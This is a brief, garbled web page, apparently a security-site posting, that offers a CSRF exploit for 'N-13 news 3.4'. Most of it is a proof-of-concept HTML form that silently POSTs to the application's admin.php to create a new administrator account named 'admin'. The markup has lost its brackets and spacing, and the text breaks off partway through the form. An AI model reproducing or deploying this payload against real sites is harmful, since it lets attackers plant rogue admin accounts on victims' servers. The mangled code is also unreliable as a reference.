N - 1 3 news 3.4 remote admin add CSRF vulnerability-vulnerability warning-the black bar safety net
EXP: the html head titleRemote Admin Add CSRF Exploit/title /head H2Remote Admin Add CSRF Exploit by qing-Edit/H2 formmethod="POST"name="form0"action="http://localhost/news/admin.php?action=options&mod=accounts&create=new" inputtype="hidden"name="accountname"value="admin" /...